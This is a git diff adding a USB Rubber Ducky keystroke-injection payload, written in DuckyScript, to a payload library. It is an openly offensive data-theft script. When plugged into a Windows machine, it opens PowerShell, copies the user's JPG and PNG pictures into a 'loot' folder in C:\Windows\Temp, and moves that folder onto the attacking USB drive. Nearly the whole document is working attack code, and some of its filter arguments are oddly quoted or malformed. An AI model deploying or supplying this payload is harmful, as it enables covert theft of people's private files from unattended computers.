diff --git a/payloads/library/credentials/datacopier/datacopier b/payloads/library/credentials/datacopier/datacopier
new file mode 100644
index 0000000..9af7e62
--- /dev/null
+++ b/payloads/library/credentials/datacopier/datacopier
@@ -0,0 +1,31 @@
+REM Written and tested by Dante Sparda
+REM this took a lot of digging and research. please use responsibly. 
+REM i wrote this on a wim but of course you can filter whatever you want to the loot folder 
+REM I used some premise i found below and modified what i needed
+REM https://www.mathewjbray.com/powershell/powershell-get-drive-letters-by-volume-name-and-execute-robocopy/
+
+DELAY 1000
+GUI R 
+DELAY 1000
+STRING powershell.exe 
+ENTER
+DELAY 3000 
+STRING cd C:\Users\$env:Username\Pictures\
+ENTER
+STRING get-childitem -Filter *.JPG", *.PNG" -path "C:\Users\$env:Username\Pictures\"
+ENTER
+STRING Copy-Item -path "C:\Users\$env:Username\Pictures\" -include "*.JPG", "*.PNG"  -Destination "C:\Windows\Temp" -Force -PassThru
+ENTER
+STRING cd C:\Windows\Temp
+ENTER
+STRING mkdir loot
+ENTER
+STRING $destinationLabel = "DUCKY"
+ENTER
+STRING $destinationLetter = Get-WmiObject -Class Win32_Volume | where {$_.Label -eq $destinationLabel} | select -expand name
+ENTER
+STRING get-childitem -Filter .jpg*, .png* -path C:\Windows\Temp | move-item -Destination "C:\Windows\Temp\loot"
+ENTER
+STRING move-item -path C:\Windows\Temp\loot -Destination $destinationLetter
+ENTER
+END